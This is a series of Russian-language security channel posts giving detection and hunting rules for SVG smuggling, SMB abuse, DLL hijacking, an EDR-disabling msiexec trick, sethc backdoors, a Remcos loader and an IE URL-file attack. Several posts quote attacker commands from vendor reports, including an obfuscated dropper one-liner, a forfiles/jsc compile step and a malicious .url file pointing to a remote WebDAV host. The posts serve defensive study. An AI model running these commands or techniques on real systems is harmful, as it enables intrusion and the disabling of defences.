Всем привет 💻✌️

Получают ли Ваши сотрудники файлы SVG?

ЛК представили небольшой обзор злоупотребления SVG.

SVG (Scalable Vector Graphics) формат описания графики в xml, который позволяет встраивать скрипты JS и теги HTML

SVG используются для доставки следующего этапа при использовании техники SVG-Smuggling (poc) или для перенаправления жертвы на следующий ресурс (пример)

🔭 Обнаружение:

🔤 Создание svg-файлов в директориях пользователя

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 11 and TargetFilename = "?:\Users\.*\.svg"

🔤 Детект на основе ADS NTFS

ProviderName="Microsoft-Windows-Sysmon" and  EventId = 15 and TargetFilename endswith ".svg:Zone.Identifier" and Contents=".*ZoneId=3.*"

🔤 Мониторить создание процессов у которых в аргументах содержится ".*svg\s.*"

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Раннее мы рассмотрели использование WebDAV для доставки вредоносов или запуска нагрузки с удаленного сервера. WebDAV не единственный протокол, которым злоупотребляют злоумышленники, давайте рассмотрим - SMB

Для монтирования сетевой папки, часто используют команду net use или в попытке получить хеш пользователя атакуют с помощью ntlm leak

🔭 Обнаружение:

🔤 Мониторим запуск net.exe или net1.exe с аргументами use

🔤 Отслеживаем создание процессов, которые начинаются с \\ или буквы тома, которая не используется, например процессы запускались с томов F: и D:, а потом notmalware.exe с тома Q:

🔤 отслеживаем исходящие сетевые соединения на 445 порт за пределами корпоративной сети

🔤 В журнале Microsoft-Windows-SMBClient/Connectivity можем найти, к каким SMB-серверам были подключения, используем для отслеживания новых и ретро по старым событиям

🎯 Для хантинга можем проверить:

🔤 ветку реестра HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\ на наличие параметров, начинающихся с ## (экранирование \\) или https, http

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Много обсуждений вызвали репорты Solar 4rays и ЛК об уязвимостях в VipNet, которые связанны с загрузкой вредоносных dll или подменой системных утилит. Аналогичные проблемы присутствуют во многих продуктах.

Для выполнения вредоносного кода из dll, может использоваться несколько техник, которые MITRE объединили в DLL. Она включает:

🔤 DLL Sideloading
🔤 DLL Search Order Hijacking
🔤 DLL Redirection
🔤 Phantom DLL Hijacking
🔤 DLL Substitution

🔭 Обнаружение:

🔤 отслеживаем создание новых dll файлов в директориях, где хранится исполняемый файл, и их загрузку в память процесса

🔤 запуск процесса и загрузка dll (без подписи или с невалидной подписью) из одной директории в профиле пользователя (\w:\\\\users\\.*\\.*\.dll$). Можно объединить с предыдущим

🔤 запуск процессов с именами системных утилит, с нестандартной цифровой подписью (отсутствием ее) или из нестандартных путей c:\windows\system32 c:\windows\syswow64 c:\windows\winsxs

🔤 загрузка dll или запуск дочернего процесса, которые ранее не использовались (нужно использовать ретро)

Скорее всего будет очень шумно...

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Недавно обсуждали уязвимости в EDR/VPN, а у EDR SentinelOne, бага by design, которая позволяет остановить службы через обновление продукта.

Как это работает❓
🔤 Как правило, во время обновления или восстановления продукта, службы и процессы EDR останавливаются
🔤 Злоумышленик запускает обновление (восстановление) через msiexec, и в момент когда процессы и службы потушились, хакер убивает процесс msiexec.exe, что приведёт к сбою установки и оставит систему без защиты.

Важные нюансы:
🔤 Уязвимость актуальна, только если вендор не реализовал механизмы самозащиты (блокировка остановки служб, запрет деинсталляции без прав админа и т.д.) или они отключены
🔤 Хакерам не нужно искать оригинальные MSI-файлы — установленные пакеты кешируются в %WINDIR%\Installer

🔭 Обнаружение:

🔤 Обнаруживаем локальные попытки установки edr/av msiexec /i или восстановления msiexec /fa
🔤 Обнаруживаем попытки использования пакетов из %WINDIR%\Installer, совпадающих с вашим вендором или установкой по GUID, который можно найти в реестре HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
🔤 Отслеживаем, используемые версии средств защиты
🔤 Отслеживаем запуск msiexec от подозрительных родительских процессов
🔤 В журнале Application отслеживаем события от провайдера MsiInstaller


События при нормальной установке пакета

1040 (путь к msi-файлу, и pid процесса, который запустил установку) -> 1042 (путь к msi-файлу, pid процесса, который запустил установку) -> 11707 (установка успешна, можем увидеть имя продукта\производителя)-> 1033 (установка завершена с кодом 0, тут можем увидеть sid-пользователя, название продукта и версию, может быть полезно для заполнения контроля установленных версий)

События при удалении пакета

11724 -> 1034 (продукт удален, тут можем увидеть название продукта и версию) 

Событие при обновлении конфигурации

11728 (обновление конфигурации) - генерируется при запуске той же версии msi-пакета

События при завершении установки с ошибкой

1033 (название продукта и версию, с кодом завершения отличным от 0) ->11708 (установка завершена с ошибкой, sid-пользователя, название продукта)

Эти события интересуют нас больше всего, именно они сгенерировались в момент обновления/восстановления продукта через msiexec

Дополнительно информацию об установленных пакетах можно посмотреть в реестре - HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\<SID>\Products\<GUID>\InstallProperties . В этом разделе реестра есть интересный ключ - InstallSource по которому можно похантить аномалии в установке EDR и т.п.

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Небольшой гайд, по созданию профиля Volatility для Linux операционных систем. В In-House SOC и MSSP идеально иметь профили под все используемые дистрибутивы и версии ядра, для этого необходимо внедрить процесс взаимодействия с it

#detection@detectioneasy

Всем привет 💻✌️
Что происходит, когда админ забыл пароль от локальной учетки? Смотрит laps?)
Или по-старинке заменит sethc.exe (utilman.exe) на cmd.exe, и создаст нового пользователя?

Последний вариант, может стать точкой входа для хакеров. Представим ситуацию, админ за собой не убрался, сервер торчит в интернет (такого не бывает 😄)

Плохие парни нажимают пару раз shift и получают права system 👤на серваке

🔭 Что же нам делать?

🔤 отслеживаем копирование системных файлов sethc.exe, utilman.exe, osk.exe, Magnify.exe, Narrator.exe, DisplaySwitch.exe
🔤 хантим, чтобы описание файла не отличалось от его имени
🔤 обнаруживаем запуск утилит из специальных возможностей, от родителя winlogon.exe и пользователя system
🔤 для профилактики берем хеш cmd.exe с каждого компа (если нет базы) и проверяем файловую систему на совпадения

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Рассмотрим атаку с безфайловым PowerShell-загрузчиком, который запускает Remcos RAT в память. 😈

Что происходит❓

Злоумышленники рассылают фишинговые письма с ZIP-архивами, внутри — поддельные LNK-файлы (часто маскируются под PDF или документы).

При открытии срабатывает цепочка:

🔤 LNK → MSHTA.exe — запускает обфусцированный HTA с удаленного ресурса.
🔤 HTA → PowerShell — vbs-скрипт используется как прокси, для запуска powershell команд: добавление в закреп HKCU:\…\CurrentVersion\Run, загрузки hta, ps1 и decoy-файла в C:\Users\Public, добавление директории C:\Users\Public в исключения Windows Defender (Add-MpPreference -ExclusionPath). В закреп добавлялась powershell-команда для запуска hta_)
🔤 In-Memory Loader — загруженный powershell декодирует base64, выделяет память через VirtualAlloc, копирует шеллкод и запускает его через CallWindowProcW, запускается Remcos RAT

Powershell Loader - может быть и супер крутой, обфусцированный, использует callback, но шаги до его запуска вообще не opsec)
Очень шумно, закреп hta в реестр, запуска hta с удаленного сервера, загрузка файлов через powershell, добавление в исключение defender...) powershell скрипт с base64 и virtualalloc


🔭 Обнаружение:
🔤 MSHTA.exe с http(s) точность близка к 100%
🔤 Закреп скриптов в HKLM\...\Run и HKCU\...\Run
🔤 Сетевые подключения от PowerShell (и в целом) на нестандартные порты за пределами корпоративной сети
🔤 Опасные командлеты в powershell VirtualAlloc, CallWindowProcW
🔤 Добавление исключений в defender (в AV)

Может получиться интересный хант

Мы можем собрать и группировать исключения AV с хостов. 
Обращаем внимание на пути, которые повторяются реже всего, если не пробили всю инфру))
Полезно проверять, что в директориях исключений AV лежит_) 

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Наконец-то досмотрел доклады с phd) Спасибо всем спикерам за проделанную работу и шеринг знаний)

Offense/Defense
🔤 Abuse GPO AD
🔤 Отключение EDR/AV
🔤 Смотрим глубже: ищем подозрительные COM-запросы на уровне ALPC
🔤 Опыт реального перехода на detection as code
🔤 Легитимные С2: как популярные сервисы работают на хакеров
🔤 Sysinternals глазами SOC
🔤 Подходы и техники для детекта «красных» утилит. Взгляд со стороны blue team, или то, как мы видим red team
🔤 Сколько стоит SOC на open source

Больше всего отклинулось внедрение ml/llm в разные области soc/cert🧠

🔤 От данных к действиям: ML в сердце DFIR
🔤 ИИ-агенты в киберразведке
🔤 Применение легковесных LLM в аналитических задачах ИБ
🔤 LLM и агенты: разгоняем SOC
🔤 AutoML threat detection: повышаем уровень автономности SOC

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

В отчете Bi.Zone рассмотрена работа двух вредоносных кампаний.

Давайте рассмотрим одну из них

🔤 Атака начинается с фишинга, пользователям присылают ссылку при переходе по которой загружается zip-архив с lnk и ini-файлом. INI по факту является архивом, в котором exe, dll и decoy-pdf. EXE - это легитимный бинарь с подписью, но уязвимый к загрузке dll

🔤 Выполняется команда LNK, которая ищет архив в каталоге пользователя %USERPROFILE%, создает JScript.NET файл. Он распаковывает zip-архив, замаскированный под расширение INI

set /p="import System;import System.IO;import System.IO.Compression;import System.Text;import System.Diagnostics;function Main(){var args:String[]=System.Environment.GetCommandLineArgs();Directory.CreateDirectory(args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[1], args[2]);System.IO.Compression.ZipFile.ExtractToDirectory(args[2] + "\\" + (Convert.ToChar(117)+Convert.ToChar(109)+Convert.ToChar(46)+Convert.ToChar(105)+Convert.ToChar(110)+Convert.ToChar(105)), args[2]);Process.Start("cmd.exe", "/C move " + System.Reflection.Assembly.GetExecutingAssembly().Location + " " + System.Reflection.Assembly.GetExecutingAssembly().Location + "_");}Main();">%TEMP%\UKSS1G4Q7H6S.a

🔤 Далее проверяется наличие легитимного файла из вложенного архива, он запускается и загружает в память вредоносную библиотеку (С# Loader), для запуска файла используется команда start с применением обфускации

^st^art "" /MIN "%USERPROFILE%\J8ZUARAW71W7\H5GDXM70NJ.exe" & exit

🔤 Если файла из шага 2 нет, то проверяется наличие unzip.exe (скомпилированный JScript.NET), который распаковывает фальшивый INI-файл

if exist %TEMP%\unzip.exe (%TEMP%\unzip.exe "%f" "%USERPROFILE%\J8ZUARAW71W7") 

🔤 Для запуска компиляции JScript.NET используется jsc.exe, который в свою очередь запускается с помощью LOLBAS - forfiles. Исполняемый файл сохраняется с именем %TEMP%\unzip.exe

(C:\Windows\system32\forfiles.exe /P %SystemRoot% /M notepad.exe /C "cmd /c %_jsc% /nologo /r:System.IO.Compression.FileSystem.dll /out:%TEMP%\unzip.exe %TEMP%\UKSS1G4Q7H6S.a")

Работа загрузчика подробно расписана в репорте, но стоит выделить основные моменты:

🔤 При обращении к серверу используется следующая строка заголовка User-Agent: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
🔤 Создается рабочий каталог %APPDATA%\74EJ6RTFKKRS
🔤 Для закрепления создается startapp.bat в каталоге автозагрузки, который запускает %APPDATA%\74EJ6RTFKKRS\H5GDXM70NJ.exe
🔤 Для защиты от песочниц следующего этапа, атакующие проверяют систему, и если он не соответствует критериям, то загружается hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf

🔭 Обнаружение

🔤 по классике, отслеживаем создание LNK-файлов
🔤 основным тригером для нас должны стать команды из LNK. набор триггеров и LOLBAS и .Net, касательно этой кампании можем поискать использование forfiles.exe и start.exe
🔤 создание скриптов в директории автозагрузки

Похантить можно:
🔤 user-agent User-Agent: «Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
🔤 наличие скриптов в директории автозагрузке пользователя
🔤 обращение на hxxps://huggingface[.]co/TheBloke/Llama-2-70B-GGUF/resolve/main/llama-2-70b.Q5_K_M.gguf

#detection@detectioneasy
#ttp@detectioneasy

Всем привет 💻✌️

Давайте сегодня поговорим о теме абстракции, касательно всех команд SOC. Тема не новая, но многие забывают о ней или не осознают ее значимость.

Абстракция - это концепция, с помощью которой детали реализации скрыты от пользователя или автоматизированы для него

Для наглядного примера я взял скриншот из проекта AbstractionMaps.

💙 Детектирование может строиться на:

🔤 Используемых утилитах - эффективно, если корректно внедрен CTI, мы понимаем контекст того, какие группировки интересуются нашей организацией и следим за ними. Названия, метаинформация файлов, User-Agent'ы, сертификаты по умолчанию и т.п.

🔤 Утилиты строятся на использовании протоколов, API/WinAPI - так мы можем их обобщить и писать правила для обнаружения нескольких инструментов одновременно.

🔤 WinAPI под капотом часто использует RPC-интерфейсы и соответствующие методы.

🔤 В зависимости от выполняемых действий, на нижнем уровне могут быть обращения к файловой системе, реестру, сетевым протоколам.

Данный подход позволяет изучить исследуемый объект с нескольких сторон и сделать наши правила более универсальными.

❤️ Красной команде понимание абстракции важно при написании инструментов и повышении стелс-возможностей.

Рассмотрим процесс создания службы. Сколько вариантов вы можете назвать? 2-3 или больше? Например:

🔤 Утилита sc.exe create
🔤 Командлет New-Service
🔤 Invoke-PSExec

...и этот список можно продолжать бесконечно (yet another tool ✌️). А если углубиться ниже, все инструменты в конечном итоге используют одни и те же системные интерфейсы и их методы:

🔤 Вызов RPC, интерфейс UUID {367ABB81-9844-35F1-AD32-98F038001003}
🔤 Named pipe \PIPE\svcctl

Можно создать службу и через реестр), и тогда все вышеописанное окажется бесполезным).

Мы рассмотрели способы создания служб, но все созданное должно где-то храниться. В Windows основные конфигурации хранятся в реестре, остальные данные — в других структурах. Для эффективного детектирования нам нужно отслеживать создание ключей реестра, а также другие низкоуровневые события, опираясь на модель абстракции.

P.S. Эффективной практикой будет также отслеживание попыток изменения легитимных служб

#detection@detectioneasy

По информации от TI Bi.Zone ClickFix зафиксирован в кампаниях нацеленных на российские организации

Наши читатели были к этому готовы ✔️

#detection@detectioneasy

Познакомимся с regseek - это база данных важных ключей реестра с их описанием, насчитывает порядка 139 артефактов.

И зачем нам это❓

🔤 Оценить качество собираемых событий. В репозитории артефакты разделены по доменам, понятно, что некоторые ключи могут быть не связаны напрямую с деятельностью APT и т.п., но помогут обнаружить нарушение политик ИБ

🔤Обогатить собираемые события (алерты) описанием из репозитория


#detection@detectioneasy

⚠️ В Internet Explorer RCE, достаточно кликнуть по ссылке)

Отчет от CheckPoint, для атаки используется URL-файл - да опять)

Содержимое:

[InternetShortcut]
URL=C:\Program Files\Internet Explorer\iediagcmd.exe
WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr
ShowCommand=7
IconIndex=13
IconFile=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Modified=20F06BA06D07BD014D

В целом ничего необычного, только iediagcmd.exe выполняет ряд команд:

ipconfig.exe /all
netsh.exe in tcp show global
netsh.exe advfirewall firewall show rule name=all verbose
route.exe print

В рабочей WorkingDirectory=\\summerartcamp[.]net@ssl@443/DavWWWRoot\OSYxaOjr хакеры размещают вредоносный route.exe, который и запускается после открытия файла

Также для атак использовался легитимный файл - CustomShellHost.exe

#detection@detectioneasy
#ttp@detectioneasy

🔭 Для обнаружения поведения выше воспользуемся правилами, которые описывали раннее и новыми:

🔤 ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and CurrentDirectory startswith "\\\\"

🔤 ProviderName="Microsoft-Windows-Sysmon" and EventId=1 and Image startswith "\\\\"

#detection@detectioneasy
#ttp@detectioneasy